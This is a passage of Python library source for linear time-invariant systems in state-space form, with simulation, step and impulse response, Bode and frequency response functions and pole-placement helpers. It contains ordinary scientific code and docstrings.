ZerosPolesGainDiscrete(
array([1, 2]),
array([3, 4]),
5,
dt: 0.1
)
"""
pass
def _atleast_2d_or_none(arg):
if arg is not None:
return atleast_2d(arg)
class StateSpace(LinearTimeInvariant):
r"""
Linear Time Invariant system in state-space form.
Represents the system as the continuous-time, first order differential
equation :math:`\dot{x} = A x + B u` or the discrete-time difference
equation :math:`x[k+1] = A x[k] + B u[k]`. `StateSpace` systems
inherit additional functionality from the `lti`, respectively the `dlti`
classes, depending on which system representation is used.
Parameters
----------
*system: arguments
The `StateSpace` class can be instantiated with 1 or 3 arguments.
The following gives the number of input arguments and their
interpretation:
* 1: `lti` or `dlti` system: (`StateSpace`, `TransferFunction` or
`ZerosPolesGain`)
* 4: array_like: (A, B, C, D)
dt: float, optional
Sampling time [s] of the discrete-time systems. Defaults to `None`
(continuous-time). Must be specified as a keyword argument, for
example, ``dt=0.1``.
See Also
--------
TransferFunction, ZerosPolesGain, lti, dlti
ss2zpk, ss2tf, zpk2sos
Notes
-----
Changing the value of properties that are not part of the
`StateSpace` system representation (such as `zeros` or `poles`) is very
inefficient and may lead to numerical inaccuracies. It is better to
convert to the specific system representation first. For example, call
``sys = sys.to_zpk()`` before accessing/changing the zeros, poles or gain.
Examples
--------
>>> from scipy import signal
>>> a = np.array([[0, 1], [0, 0]])
>>> b = np.array([[0], [1]])
>>> c = np.array([[1, 0]])
>>> d = np.array([[0]])
>>> sys = signal.StateSpace(a, b, c, d)
>>> print(sys)
StateSpaceContinuous(
array([[0, 1],
[0, 0]]),
array([[0],
[1]]),
array([[1, 0]]),
array([[0]]),
dt: None
)
>>> sys.to_discrete(0.1)
StateSpaceDiscrete(
array([[ 1. , 0.1],
[ 0. , 1. ]]),
array([[ 0.005],
[ 0.1 ]]),
array([[1, 0]]),
array([[0]]),
dt: 0.1
)
>>> a = np.array([[1, 0.1], [0, 1]])
>>> b = np.array([[0.005], [0.1]])
>>> signal.StateSpace(a, b, c, d, dt=0.1)
StateSpaceDiscrete(
array([[ 1. , 0.1],
[ 0. , 1. ]]),
array([[ 0.005],
[ 0.1 ]]),
array([[1, 0]]),
array([[0]]),
dt: 0.1
)
"""
def __new__(cls, *system, **kwargs):
"""Create new StateSpace object and settle inheritance."""
# Handle object conversion if input is an instance of `lti`
if len(system) == 1 and isinstance(system[0], LinearTimeInvariant):
return system[0].to_ss()
# Choose whether to inherit from `lti` or from `dlti`
if cls is StateSpace:
if kwargs.get('dt') is None:
return StateSpaceContinuous.__new__(StateSpaceContinuous,
*system, **kwargs)
else:
return StateSpaceDiscrete.__new__(StateSpaceDiscrete,
*system, **kwargs)
# No special conversion needed
return super(StateSpace, cls).__new__(cls)
def __init__(self, *system, **kwargs):
"""Initialize the state space lti/dlti system."""
# Conversion of lti instances is handled in __new__
if isinstance(system[0], LinearTimeInvariant):
return
# Remove system arguments, not needed by parents anymore
super(StateSpace, self).__init__(**kwargs)
self._A = None
self._B = None
self._C = None
self._D = None
self.A, self.B, self.C, self.D = abcd_normalize(*system)
def __repr__(self):
"""Return representation of the `StateSpace` system."""
return '{0}(\n{1},\n{2},\n{3},\n{4},\ndt: {5}\n)'.format(
self.__class__.__name__,
repr(self.A),
repr(self.B),
repr(self.C),
repr(self.D),
repr(self.dt),
)
@property
def A(self):
"""State matrix of the `StateSpace` system."""
return self._A
@A.setter
def A(self, A):
self._A = _atleast_2d_or_none(A)
@property
def B(self):
"""Input matrix of the `StateSpace` system."""
return self._B
@B.setter
def B(self, B):
self._B = _atleast_2d_or_none(B)
self.inputs = self.B.shape[-1]
@property
def C(self):
"""Output matrix of the `StateSpace` system."""
return self._C
@C.setter
def C(self, C):
self._C = _atleast_2d_or_none(C)
self.outputs = self.C.shape[0]
@property
def D(self):
"""Feedthrough matrix of the `StateSpace` system."""
return self._D
@D.setter
def D(self, D):
self._D = _atleast_2d_or_none(D)
def _copy(self, system):
"""
Copy the parameters of another `StateSpace` system.
Parameters
----------
system : instance of `StateSpace`
The state-space system that is to be copied
"""
self.A = system.A
self.B = system.B
self.C = system.C
self.D = system.D
def to_tf(self, **kwargs):
"""
Convert system representation to `TransferFunction`.
Parameters
----------
kwargs : dict, optional
Additional keywords passed to `ss2zpk`
Returns
-------
sys : instance of `TransferFunction`
Transfer function of the current system
"""
return TransferFunction(*ss2tf(self._A, self._B, self._C, self._D,
**kwargs), **self._dt_dict)
def to_zpk(self, **kwargs):
"""
Convert system representation to `ZerosPolesGain`.
Parameters
----------
kwargs : dict, optional
Additional keywords passed to `ss2zpk`
Returns
-------
sys : instance of `ZerosPolesGain`
Zeros, poles, gain representation of the current system
"""
return ZerosPolesGain(*ss2zpk(self._A, self._B, self._C, self._D,
**kwargs), **self._dt_dict)
def to_ss(self):
"""
Return a copy of the current `StateSpace` system.
Returns
-------
sys : instance of `StateSpace`
The current system (copy)
"""
return copy.deepcopy(self)
class StateSpaceContinuous(StateSpace, lti):
r"""
Continuous-time Linear Time Invariant system in state-space form.
Represents the system as the continuous-time, first order differential
equation :math:`\dot{x} = A x + B u`.
Continuous-time `StateSpace` systems inherit additional functionality
from the `lti` class.
Parameters
----------
*system: arguments
The `StateSpace` class can be instantiated with 1 or 3 arguments.
The following gives the number of input arguments and their
interpretation:
* 1: `lti` system: (`StateSpace`, `TransferFunction` or
`ZerosPolesGain`)
* 4: array_like: (A, B, C, D)
See Also
--------
TransferFunction, ZerosPolesGain, lti
ss2zpk, ss2tf, zpk2sos
Notes
-----
Changing the value of properties that are not part of the
`StateSpace` system representation (such as `zeros` or `poles`) is very
inefficient and may lead to numerical inaccuracies. It is better to
convert to the specific system representation first. For example, call
``sys = sys.to_zpk()`` before accessing/changing the zeros, poles or gain.
Examples
--------
>>> from scipy import signal
>>> a = np.array([[0, 1], [0, 0]])
>>> b = np.array([[0], [1]])
>>> c = np.array([[1, 0]])
>>> d = np.array([[0]])
>>> sys = signal.StateSpace(a, b, c, d)
>>> print(sys)
StateSpaceContinuous(
array([[0, 1],
[0, 0]]),
array([[0],
[1]]),
array([[1, 0]]),
array([[0]]),
dt: None
)
"""
def to_discrete(self, dt, method='zoh', alpha=None):
"""
Returns the discretized `StateSpace` system.
Parameters: See `cont2discrete` for details.
Returns
-------
sys: instance of `dlti` and `StateSpace`
"""
return StateSpace(*cont2discrete((self.A, self.B, self.C, self.D),
dt,
method=method,
alpha=alpha)[:-1],
dt=dt)
class StateSpaceDiscrete(StateSpace, dlti):
r"""
Discrete-time Linear Time Invariant system in state-space form.
Represents the system as the discrete-time difference equation
:math:`x[k+1] = A x[k] + B u[k]`.
`StateSpace` systems inherit additional functionality from the `dlti`
class.
Parameters
----------
*system: arguments
The `StateSpace` class can be instantiated with 1 or 3 arguments.
The following gives the number of input arguments and their
interpretation:
* 1: `dlti` system: (`StateSpace`, `TransferFunction` or
`ZerosPolesGain`)
* 4: array_like: (A, B, C, D)
dt: float, optional
Sampling time [s] of the discrete-time systems. Defaults to `True`
(unspecified sampling time). Must be specified as a keyword argument,
for example, ``dt=0.1``.
See Also
--------
TransferFunction, ZerosPolesGain, dlti
ss2zpk, ss2tf, zpk2sos
Notes
-----
Changing the value of properties that are not part of the
`StateSpace` system representation (such as `zeros` or `poles`) is very
inefficient and may lead to numerical inaccuracies. It is better to
convert to the specific system representation first. For example, call
``sys = sys.to_zpk()`` before accessing/changing the zeros, poles or gain.
Examples
--------
>>> from scipy import signal
>>> a = np.array([[1, 0.1], [0, 1]])
>>> b = np.array([[0.005], [0.1]])
>>> c = np.array([[1, 0]])
>>> d = np.array([[0]])
>>> signal.StateSpace(a, b, c, d, dt=0.1)
StateSpaceDiscrete(
array([[ 1. , 0.1],
[ 0. , 1. ]]),
array([[ 0.005],
[ 0.1 ]]),
array([[1, 0]]),
array([[0]]),
dt: 0.1
)
"""
pass
def lsim2(system, U=None, T=None, X0=None, **kwargs):
"""
Simulate output of a continuous-time linear system, by using
the ODE solver `scipy.integrate.odeint`.
Parameters
----------
system : an instance of the `lti` class or a tuple describing the system.
The following gives the number of elements in the tuple and
the interpretation:
* 1: (instance of `lti`)
* 2: (num, den)
* 3: (zeros, poles, gain)
* 4: (A, B, C, D)
U : array_like (1D or 2D), optional
An input array describing the input at each time T. Linear
interpolation is used between given times. If there are
multiple inputs, then each column of the rank-2 array
represents an input. If U is not given, the input is assumed
to be zero.
T : array_like (1D or 2D), optional
The time steps at which the input is defined and at which the
output is desired. The default is 101 evenly spaced points on
the interval [0,10.0].
X0 : array_like (1D), optional
The initial condition of the state vector. If `X0` is not
given, the initial conditions are assumed to be 0.
kwargs : dict
Additional keyword arguments are passed on to the function
`odeint`. See the notes below for more details.
Returns
-------
T : 1D ndarray
The time values for the output.
yout : ndarray
The response of the system.
xout : ndarray
The time-evolution of the state-vector.
Notes
-----
This function uses `scipy.integrate.odeint` to solve the
system's differential equations. Additional keyword arguments
given to `lsim2` are passed on to `odeint`. See the documentation
for `scipy.integrate.odeint` for the full list of arguments.
If (num, den) is passed in for ``system``, coefficients for both the
numerator and denominator should be specified in descending exponent
order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).
"""
if isinstance(system, lti):
sys = system._as_ss()
elif isinstance(system, dlti):
raise AttributeError('lsim2 can only be used with continuous-time '
'systems.')
else:
sys = lti(*system)._as_ss()
if X0 is None:
X0 = zeros(sys.B.shape[0], sys.A.dtype)
if T is None:
# XXX T should really be a required argument, but U was
# changed from a required positional argument to a keyword,
# and T is after U in the argument list. So we either: change
# the API and move T in front of U; check here for T being
# None and raise an exception; or assign a default value to T
# here. This code implements the latter.
T = linspace(0, 10.0, 101)
T = atleast_1d(T)
if len(T.shape) != 1:
raise ValueError("T must be a rank-1 array.")
if U is not None:
U = atleast_1d(U)
if len(U.shape) == 1:
U = U.reshape(-1, 1)
sU = U.shape
if sU[0] != len(T):
raise ValueError("U must have the same number of rows "
"as elements in T.")
if sU[1] != sys.inputs:
raise ValueError("The number of inputs in U (%d) is not "
"compatible with the number of system "
"inputs (%d)" % (sU[1], sys.inputs))
# Create a callable that uses linear interpolation to
# calculate the input at any time.
ufunc = interpolate.interp1d(T, U, kind='linear',
axis=0, bounds_error=False)
def fprime(x, t, sys, ufunc):
"""The vector field of the linear system."""
return dot(sys.A, x) + squeeze(dot(sys.B, nan_to_num(ufunc([t]))))
xout = integrate.odeint(fprime, X0, T, args=(sys, ufunc), **kwargs)
yout = dot(sys.C, transpose(xout)) + dot(sys.D, transpose(U))
else:
def fprime(x, t, sys):
"""The vector field of the linear system."""
return dot(sys.A, x)
xout = integrate.odeint(fprime, X0, T, args=(sys,), **kwargs)
yout = dot(sys.C, transpose(xout))
return T, squeeze(transpose(yout)), xout
def _cast_to_array_dtype(in1, in2):
"""Cast array to dtype of other array, while avoiding ComplexWarning.
Those can be raised when casting complex to real.
"""
if numpy.issubdtype(in2.dtype, numpy.float):
# dtype to cast to is not complex, so use .real
in1 = in1.real.astype(in2.dtype)
else:
in1 = in1.astype(in2.dtype)
return in1
def lsim(system, U, T, X0=None, interp=True):
"""
Simulate output of a continuous-time linear system.
Parameters
----------
system : an instance of the LTI class or a tuple describing the system.
The following gives the number of elements in the tuple and
the interpretation:
* 1: (instance of `lti`)
* 2: (num, den)
* 3: (zeros, poles, gain)
* 4: (A, B, C, D)
U : array_like
An input array describing the input at each time `T`
(interpolation is assumed between given times). If there are
multiple inputs, then each column of the rank-2 array
represents an input. If U = 0 or None, a zero input is used.
T : array_like
The time steps at which the input is defined and at which the
output is desired. Must be nonnegative, increasing, and equally spaced.
X0 : array_like, optional
The initial conditions on the state vector (zero by default).
interp : bool, optional
Whether to use linear (True, the default) or zero-order-hold (False)
interpolation for the input array.
Returns
-------
T : 1D ndarray
Time values for the output.
yout : 1D ndarray
System response.
xout : ndarray
Time evolution of the state vector.
Notes
-----
If (num, den) is passed in for ``system``, coefficients for both the
numerator and denominator should be specified in descending exponent
order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).
Examples
--------
Simulate a double integrator y'' = u, with a constant input u = 1
>>> from scipy import signal
>>> system = signal.lti([[0., 1.], [0., 0.]], [[0.], [1.]], [[1., 0.]], 0.)
>>> t = np.linspace(0, 5)
>>> u = np.ones_like(t)
>>> tout, y, x = signal.lsim(system, u, t)
>>> import matplotlib.pyplot as plt
>>> plt.plot(t, y)
"""
if isinstance(system, lti):
sys = system._as_ss()
elif isinstance(system, dlti):
raise AttributeError('lsim can only be used with continuous-time '
'systems.')
else:
sys = lti(*system)._as_ss()
T = atleast_1d(T)
if len(T.shape) != 1:
raise ValueError("T must be a rank-1 array.")
A, B, C, D = map(np.asarray, (sys.A, sys.B, sys.C, sys.D))
n_states = A.shape[0]
n_inputs = B.shape[1]
n_steps = T.size
if X0 is None:
X0 = zeros(n_states, sys.A.dtype)
xout = zeros((n_steps, n_states), sys.A.dtype)
if T[0] == 0:
xout[0] = X0
elif T[0] > 0:
# step forward to initial time, with zero input
xout[0] = dot(X0, linalg.expm(transpose(A) * T[0]))
else:
raise ValueError("Initial time must be nonnegative")
no_input = (U is None or
(isinstance(U, (int, float)) and U == 0.) or
not np.any(U))
if n_steps == 1:
yout = squeeze(dot(xout, transpose(C)))
if not no_input:
yout += squeeze(dot(U, transpose(D)))
return T, squeeze(yout), squeeze(xout)
dt = T[1] - T[0]
if not np.allclose((T[1:] - T[:-1]) / dt, 1.0):
warnings.warn("Non-uniform timesteps are deprecated. Results may be "
"slow and/or inaccurate.", DeprecationWarning)
return lsim2(system, U, T, X0)
if no_input:
# Zero input: just use matrix exponential
# take transpose because state is a row vector
expAT_dt = linalg.expm(transpose(A) * dt)
for i in xrange(1, n_steps):
xout[i] = dot(xout[i-1], expAT_dt)
yout = squeeze(dot(xout, transpose(C)))
return T, squeeze(yout), squeeze(xout)
# Nonzero input
U = atleast_1d(U)
if U.ndim == 1:
U = U[:, np.newaxis]
if U.shape[0] != n_steps:
raise ValueError("U must have the same number of rows "
"as elements in T.")
if U.shape[1] != n_inputs:
raise ValueError("System does not define that many inputs.")
if not interp:
# Zero-order hold
# Algorithm: to integrate from time 0 to time dt, we solve
# xdot = A x + B u, x(0) = x0
# udot = 0, u(0) = u0.
#
# Solution is
# [ x(dt) ] [ A*dt B*dt ] [ x0 ]
# [ u(dt) ] = exp [ 0 0 ] [ u0 ]
M = np.vstack([np.hstack([A * dt, B * dt]),
np.zeros((n_inputs, n_states + n_inputs))])
# transpose everything because the state and input are row vectors
expMT = linalg.expm(transpose(M))
Ad = expMT[:n_states, :n_states]
Bd = expMT[n_states:, :n_states]
for i in xrange(1, n_steps):
xout[i] = dot(xout[i-1], Ad) + dot(U[i-1], Bd)
else:
# Linear interpolation between steps
# Algorithm: to integrate from time 0 to time dt, with linear
# interpolation between inputs u(0) = u0 and u(dt) = u1, we solve
# xdot = A x + B u, x(0) = x0
# udot = (u1 - u0) / dt, u(0) = u0.
#
# Solution is
# [ x(dt) ] [ A*dt B*dt 0 ] [ x0 ]
# [ u(dt) ] = exp [ 0 0 I ] [ u0 ]
# [u1 - u0] [ 0 0 0 ] [u1 - u0]
M = np.vstack([np.hstack([A * dt, B * dt,
np.zeros((n_states, n_inputs))]),
np.hstack([np.zeros((n_inputs, n_states + n_inputs)),
np.identity(n_inputs)]),
np.zeros((n_inputs, n_states + 2 * n_inputs))])
expMT = linalg.expm(transpose(M))
Ad = expMT[:n_states, :n_states]
Bd1 = expMT[n_states+n_inputs:, :n_states]
Bd0 = expMT[n_states:n_states + n_inputs, :n_states] - Bd1
for i in xrange(1, n_steps):
xout[i] = (dot(xout[i-1], Ad) + dot(U[i-1], Bd0) + dot(U[i], Bd1))
yout = (squeeze(dot(xout, transpose(C))) + squeeze(dot(U, transpose(D))))
return T, squeeze(yout), squeeze(xout)
def _default_response_times(A, n):
"""Compute a reasonable set of time samples for the response time.
This function is used by `impulse`, `impulse2`, `step` and `step2`
to compute the response time when the `T` argument to the function
is None.
Parameters
----------
A : array_like
The system matrix, which is square.
n : int
The number of time samples to generate.
Returns
-------
t : ndarray
The 1-D array of length `n` of time samples at which the response
is to be computed.
"""
# Create a reasonable time interval.
# TODO: This could use some more work.
# For example, what is expected when the system is unstable?
vals = linalg.eigvals(A)
r = min(abs(real(vals)))
if r == 0.0:
r = 1.0
tc = 1.0 / r
t = linspace(0.0, 7 * tc, n)
return t
def impulse(system, X0=None, T=None, N=None):
"""Impulse response of continuous-time system.
Parameters
----------
system : an instance of the LTI class or a tuple of array_like
describing the system.
The following gives the number of elements in the tuple and
the interpretation:
* 1 (instance of `lti`)
* 2 (num, den)
* 3 (zeros, poles, gain)
* 4 (A, B, C, D)
X0 : array_like, optional
Initial state-vector. Defaults to zero.
T : array_like, optional
Time points. Computed if not given.
N : int, optional
The number of time points to compute (if `T` is not given).
Returns
-------
T : ndarray
A 1-D array of time points.
yout : ndarray
A 1-D array containing the impulse response of the system (except for
singularities at zero).
Notes
-----
If (num, den) is passed in for ``system``, coefficients for both the
numerator and denominator should be specified in descending exponent
order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).
"""
if isinstance(system, lti):
sys = system._as_ss()
elif isinstance(system, dlti):
raise AttributeError('impulse can only be used with continuous-time '
'systems.')
else:
sys = lti(*system)._as_ss()
if X0 is None:
X = squeeze(sys.B)
else:
X = squeeze(sys.B + X0)
if N is None:
N = 100
if T is None:
T = _default_response_times(sys.A, N)
else:
T = asarray(T)
_, h, _ = lsim(sys, 0., T, X, interp=False)
return T, h
def impulse2(system, X0=None, T=None, N=None, **kwargs):
"""
Impulse response of a single-input, continuous-time linear system.
Parameters
----------
system : an instance of the LTI class or a tuple of array_like
describing the system.
The following gives the number of elements in the tuple and
the interpretation:
* 1 (instance of `lti`)
* 2 (num, den)
* 3 (zeros, poles, gain)
* 4 (A, B, C, D)
X0 : 1-D array_like, optional
The initial condition of the state vector. Default: 0 (the
zero vector).
T : 1-D array_like, optional
The time steps at which the input is defined and at which the
output is desired. If `T` is not given, the function will
generate a set of time samples automatically.
N : int, optional
Number of time points to compute. Default: 100.
kwargs : various types
Additional keyword arguments are passed on to the function
`scipy.signal.lsim2`, which in turn passes them on to
`scipy.integrate.odeint`; see the latter's documentation for
information about these arguments.
Returns
-------
T : ndarray
The time values for the output.
yout : ndarray
The output response of the system.
See Also
--------
impulse, lsim2, integrate.odeint
Notes
-----
The solution is generated by calling `scipy.signal.lsim2`, which uses
the differential equation solver `scipy.integrate.odeint`.
If (num, den) is passed in for ``system``, coefficients for both the
numerator and denominator should be specified in descending exponent
order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).
.. versionadded:: 0.8.0
Examples
--------
Second order system with a repeated root: x''(t) + 2*x(t) + x(t) = u(t)
>>> from scipy import signal
>>> system = ([1.0], [1.0, 2.0, 1.0])
>>> t, y = signal.impulse2(system)
>>> import matplotlib.pyplot as plt
>>> plt.plot(t, y)
"""
if isinstance(system, lti):
sys = system._as_ss()
elif isinstance(system, dlti):
raise AttributeError('impulse2 can only be used with continuous-time '
'systems.')
else:
sys = lti(*system)._as_ss()
B = sys.B
if B.shape[-1] != 1:
raise ValueError("impulse2() requires a single-input system.")
B = B.squeeze()
if X0 is None:
X0 = zeros_like(B)
if N is None:
N = 100
if T is None:
T = _default_response_times(sys.A, N)
# Move the impulse in the input to the initial conditions, and then
# solve using lsim2().
ic = B + X0
Tr, Yr, Xr = lsim2(sys, T=T, X0=ic, **kwargs)
return Tr, Yr
def step(system, X0=None, T=None, N=None):
"""Step response of continuous-time system.
Parameters
----------
system : an instance of the LTI class or a tuple of array_like
describing the system.
The following gives the number of elements in the tuple and
the interpretation:
* 1 (instance of `lti`)
* 2 (num, den)
* 3 (zeros, poles, gain)
* 4 (A, B, C, D)
X0 : array_like, optional
Initial state-vector (default is zero).
T : array_like, optional
Time points (computed if not given).
N : int, optional
Number of time points to compute if `T` is not given.
Returns
-------
T : 1D ndarray
Output time points.
yout : 1D ndarray
Step response of system.
See also
--------
scipy.signal.step2
Notes
-----
If (num, den) is passed in for ``system``, coefficients for both the
numerator and denominator should be specified in descending exponent
order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).
"""
if isinstance(system, lti):
sys = system._as_ss()
elif isinstance(system, dlti):
raise AttributeError('step can only be used with continuous-time '
'systems.')
else:
sys = lti(*system)._as_ss()
if N is None:
N = 100
if T is None:
T = _default_response_times(sys.A, N)
else:
T = asarray(T)
U = ones(T.shape, sys.A.dtype)
vals = lsim(sys, U, T, X0=X0, interp=False)
return vals[0], vals[1]
def step2(system, X0=None, T=None, N=None, **kwargs):
"""Step response of continuous-time system.
This function is functionally the same as `scipy.signal.step`, but
it uses the function `scipy.signal.lsim2` to compute the step
response.
Parameters
----------
system : an instance of the LTI class or a tuple of array_like
describing the system.
The following gives the number of elements in the tuple and
the interpretation:
* 1 (instance of `lti`)
* 2 (num, den)
* 3 (zeros, poles, gain)
* 4 (A, B, C, D)
X0 : array_like, optional
Initial state-vector (default is zero).
T : array_like, optional
Time points (computed if not given).
N : int, optional
Number of time points to compute if `T` is not given.
kwargs : various types
Additional keyword arguments are passed on the function
`scipy.signal.lsim2`, which in turn passes them on to
`scipy.integrate.odeint`. See the documentation for
`scipy.integrate.odeint` for information about these arguments.
Returns
-------
T : 1D ndarray
Output time points.
yout : 1D ndarray
Step response of system.
See also
--------
scipy.signal.step
Notes
-----
If (num, den) is passed in for ``system``, coefficients for both the
numerator and denominator should be specified in descending exponent
order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).
.. versionadded:: 0.8.0
"""
if isinstance(system, lti):
sys = system._as_ss()
elif isinstance(system, dlti):
raise AttributeError('step2 can only be used with continuous-time '
'systems.')
else:
sys = lti(*system)._as_ss()
if N is None:
N = 100
if T is None:
T = _default_response_times(sys.A, N)
else:
T = asarray(T)
U = ones(T.shape, sys.A.dtype)
vals = lsim2(sys, U, T, X0=X0, **kwargs)
return vals[0], vals[1]
def bode(system, w=None, n=100):
"""
Calculate Bode magnitude and phase data of a continuous-time system.
Parameters
----------
system : an instance of the LTI class or a tuple describing the system.
The following gives the number of elements in the tuple and
the interpretation:
* 1 (instance of `lti`)
* 2 (num, den)
* 3 (zeros, poles, gain)
* 4 (A, B, C, D)
w : array_like, optional
Array of frequencies (in rad/s). Magnitude and phase data is calculated
for every value in this array. If not given a reasonable set will be
calculated.
n : int, optional
Number of frequency points to compute if `w` is not given. The `n`
frequencies are logarithmically spaced in an interval chosen to
include the influence of the poles and zeros of the system.
Returns
-------
w : 1D ndarray
Frequency array [rad/s]
mag : 1D ndarray
Magnitude array [dB]
phase : 1D ndarray
Phase array [deg]
Notes
-----
If (num, den) is passed in for ``system``, coefficients for both the
numerator and denominator should be specified in descending exponent
order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).
.. versionadded:: 0.11.0
Examples
--------
>>> from scipy import signal
>>> import matplotlib.pyplot as plt
>>> sys = signal.TransferFunction([1], [1, 1])
>>> w, mag, phase = signal.bode(sys)
>>> plt.figure()
>>> plt.semilogx(w, mag) # Bode magnitude plot
>>> plt.figure()
>>> plt.semilogx(w, phase) # Bode phase plot
>>> plt.show()
"""
w, y = freqresp(system, w=w, n=n)
mag = 20.0 * numpy.log10(abs(y))
phase = numpy.unwrap(numpy.arctan2(y.imag, y.real)) * 180.0 / numpy.pi
return w, mag, phase
def freqresp(system, w=None, n=10000):
"""Calculate the frequency response of a continuous-time system.
Parameters
----------
system : an instance of the `lti` class or a tuple describing the system.
The following gives the number of elements in the tuple and
the interpretation:
* 1 (instance of `lti`)
* 2 (num, den)
* 3 (zeros, poles, gain)
* 4 (A, B, C, D)
w : array_like, optional
Array of frequencies (in rad/s). Magnitude and phase data is
calculated for every value in this array. If not given, a reasonable
set will be calculated.
n : int, optional
Number of frequency points to compute if `w` is not given. The `n`
frequencies are logarithmically spaced in an interval chosen to
include the influence of the poles and zeros of the system.
Returns
-------
w : 1D ndarray
Frequency array [rad/s]
H : 1D ndarray
Array of complex magnitude values
Notes
-----
If (num, den) is passed in for ``system``, coefficients for both the
numerator and denominator should be specified in descending exponent
order (e.g. ``s^2 + 3s + 5`` would be represented as ``[1, 3, 5]``).
Examples
--------
Generating the Nyquist plot of a transfer function
>>> from scipy import signal
>>> import matplotlib.pyplot as plt
Transfer function: H(s) = 5 / (s-1)^3
>>> s1 = signal.ZerosPolesGain([], [1, 1, 1], [5])
>>> w, H = signal.freqresp(s1)
>>> plt.figure()
>>> plt.plot(H.real, H.imag, "b")
>>> plt.plot(H.real, -H.imag, "r")
>>> plt.show()
"""
if isinstance(system, lti):
if isinstance(system, (TransferFunction, ZerosPolesGain)):
sys = system
else:
sys = system._as_zpk()
elif isinstance(system, dlti):
raise AttributeError('freqresp can only be used with continuous-time '
'systems.')
else:
sys = lti(*system)._as_zpk()
if sys.inputs != 1 or sys.outputs != 1:
raise ValueError("freqresp() requires a SISO (single input, single "
"output) system.")
if w is not None:
worN = w
else:
worN = n
if isinstance(sys, TransferFunction):
# In the call to freqs(), sys.num.ravel() is used because there are
# cases where sys.num is a 2-D array with a single row.
w, h = freqs(sys.num.ravel(), sys.den, worN=worN)
elif isinstance(sys, ZerosPolesGain):
w, h = freqs_zpk(sys.zeros, sys.poles, sys.gain, worN=worN)
return w, h
# This class will be used by place_poles to return its results
# see http://code.activestate.com/recipes/52308/
class Bunch:
def __init__(self, **kwds):
self.__dict__.update(kwds)
def _valid_inputs(A, B, poles, method, rtol, maxiter):
"""
Check the poles come in complex conjugage pairs
Check shapes of A, B and poles are compatible.
Check the method chosen is compatible with provided poles
Return update method to use and ordered poles
"""
poles = np.asarray(poles)
if poles.ndim > 1:
raise ValueError("Poles must be a 1D array like.")
# Will raise ValueError if poles do not come in complex conjugates pairs
poles = _order_complex_poles(poles)
if A.ndim > 2:
raise ValueError("A must be a 2D array/matrix.")
if B.ndim > 2:
raise ValueError("B must be a 2D array/matrix")
if A.shape[0] != A.shape[1]:
raise ValueError("A must be square")
if len(poles) > A.shape[0]:
raise ValueError("maximum number of poles is %d but you asked for %d" %
(A.shape[0], len(poles)))
if len(poles) < A.shape[0]:
raise ValueError("number of poles is %d but you should provide %d" %
(len(poles), A.shape[0]))
r = np.linalg.matrix_rank(B)
for p in poles:
if sum(p == poles) > r:
raise ValueError("at least one of the requested pole is repeated "
"more than rank(B) times")
# Choose update method
update_loop = _YT_loop
if method not in ('KNV0','YT'):
raise ValueError("The method keyword must be one of 'YT' or 'KNV0'")
if method == "KNV0":
update_loop = _KNV0_loop
if not all(np.isreal(poles)):
raise ValueError("Complex poles are not supported by KNV0")
if maxiter < 1:
raise ValueError("maxiter must be at least equal to 1")
# We do not check rtol <= 0 as the user can use a negative rtol to
# force maxiter iterations
if rtol > 1:
raise ValueError("rtol can not be greater than 1")
return update_loop, poles
def _order_complex_poles(poles):
"""
Check we have complex conjugates pairs and reorder P according to YT, ie
real_poles, complex_i, conjugate complex_i, ....
The lexicographic sort on the complex poles is added to help the user to
compare sets of poles.
"""
ordered_poles = np.sort(poles[np.isreal(poles)])
im_poles = []
for p in np.sort(poles[np.imag(poles) < 0]):
if np.conj(p) in poles:
im_poles.extend((p, np.conj(p)))
ordered_poles = np.hstack((ordered_poles, im_poles))
if poles.shape[0] != len(ordered_poles):
raise ValueError("Complex poles must come with their conjugates")
return ordered_poles
def _KNV0(B, ker_pole, transfer_matrix, j, poles):
"""
Algorithm "KNV0" Kautsky et Al. Robust pole
assignment in linear state feedback, Int journal of Control
1985, vol 41 p 1129->1155
http://la.epfl.ch/files/content/sites/la/files/
users/105941/public/KautskyNicholsDooren
"""
# Remove xj form the base
transfer_matrix_not_j = np.delete(transfer_matrix, j, axis=1)
# If we QR this matrix in full mode Q=Q0|Q1
# then Q1 will be a single column orthogonnal to
# Q0, that's what we are looking for !
# After merge of gh-4249 great speed improvements could be achieved
# using QR updates instead of full QR in the line below
# To debug with numpy qr uncomment the line below
# Q, R = np.linalg.qr(transfer_matrix_not_j, mode="complete")
Q, R = s_qr(transfer_matrix_not_j, mode="full")
mat_ker_pj = np.dot(ker_pole[j], ker_pole[j].T)
yj = np.dot(mat_ker_pj, Q[:, -1])
# If Q[:, -1] is "almost" orthogonal to ker_pole[j] its
# projection into ker_pole[j] will yield a vector
# close to 0. As we are looking for a vector in ker_pole[j]
# simply stick with transfer_matrix[:, j] (unless someone provides me with
# a better choice ?)
if not np.allclose(yj, 0):
xj = yj/np.linalg.norm(yj)
transfer_matrix[:, j] = xj
# KNV does not support complex poles, using YT technique the two lines
# below seem to work 9 out of 10 times but it is not reliable enough:
# transfer_matrix[:, j]=real(xj)
# transfer_matrix[:, j+1]=imag(xj)
# Add this at the beginning of this function if you wish to test
# complex support:
# if ~np.isreal(P[j]) and (j>=B.shape[0]-1 or P[j]!=np.conj(P[j+1])):
# return
# Problems arise when imag(xj)=>0 I have no idea on how to fix this
def _YT_real(ker_pole, Q, transfer_matrix, i, j):
"""
Applies algorithm from YT section 6.1 page 19 related to real pairs
"""
# step 1 page 19
u = Q[:, -2, np.newaxis]
v = Q[:, -1, np.newaxis]
# step 2 page 19
m = np.dot(np.dot(ker_pole[i].T, np.dot(u, v.T) -
np.dot(v, u.T)), ker_pole[j])
# step 3 page 19
um, sm, vm = np.linalg.svd(m)
# mu1, mu2 two first columns of U => 2 first lines of U.T
mu1, mu2 = um.T[:2, :, np.newaxis]
# VM is V.T with numpy we want the first two lines of V.T
nu1, nu2 = vm[:2, :, np.newaxis]
# what follows is a rough python translation of the formulas
# in section 6.2 page 20 (step 4)
transfer_matrix_j_mo_transfer_matrix_j = np.vstack((
transfer_matrix[:, i, np.newaxis],
transfer_matrix[:, j, np.newaxis]))
if not np.allclose(sm[0], sm[1]):
